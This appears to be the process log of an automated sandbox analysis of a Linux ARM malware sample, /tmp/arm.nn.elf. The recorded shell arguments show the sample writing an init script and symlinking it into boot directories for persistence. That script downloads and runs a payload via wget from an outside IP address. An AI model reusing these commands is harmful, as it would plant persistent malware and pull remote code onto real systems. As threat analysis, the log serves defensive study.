                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/ln
                                    Arguments:ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
                                    File size:76160 bytes
                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/chmod
                                    Arguments:chmod +x /etc/init.d/arm.nn.elf
                                    File size:63864 bytes
                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/mkdir
                                    Arguments:mkdir -p /etc/rc.d
                                    File size:88408 bytes
                                    MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/ln
                                    Arguments:ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
                                    File size:76160 bytes
                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:45
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:45
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:51
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:51
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:57
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:44:57
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:45:32
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:45:35
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:45:44
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:45:48
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:46:18
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:47:11
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/libexec/gnome-session-binary
                                    Arguments:-
                                    File size:334664 bytes
                                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/libexec/gsd-housekeeping
                                    Arguments:/usr/libexec/gsd-housekeeping
                                    File size:51840 bytes
                                    MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/systemd/systemd
                                    Arguments:-
                                    File size:1620224 bytes
                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                    File size:22760 bytes
                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:55
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:43:56
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:56
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:43:56
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:57
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:43:57
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:43:57
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:45
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:45
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:46
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:46
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:51
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:51
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:52
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:52
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:44:57
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:44:57
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:45:01
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:45:01
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:45:36
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:45:52
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:47:12
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:47:12
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:47:12
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:47:12
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:47:13
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:47:13
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                    Start time (UTC):09:47:13
                                    Start date (UTC):06/10/2024
                                    Path:/usr/lib/udisks2/udisksd
                                    Arguments:-
                                    File size:483056 bytes
                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                    Start time (UTC):09:47:13
                                    Start date (UTC):06/10/2024
                                    Path:/usr/sbin/dumpe2fs
                                    Arguments:dumpe2fs -h /dev/dm-0
                                    File size:31112 bytes
                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4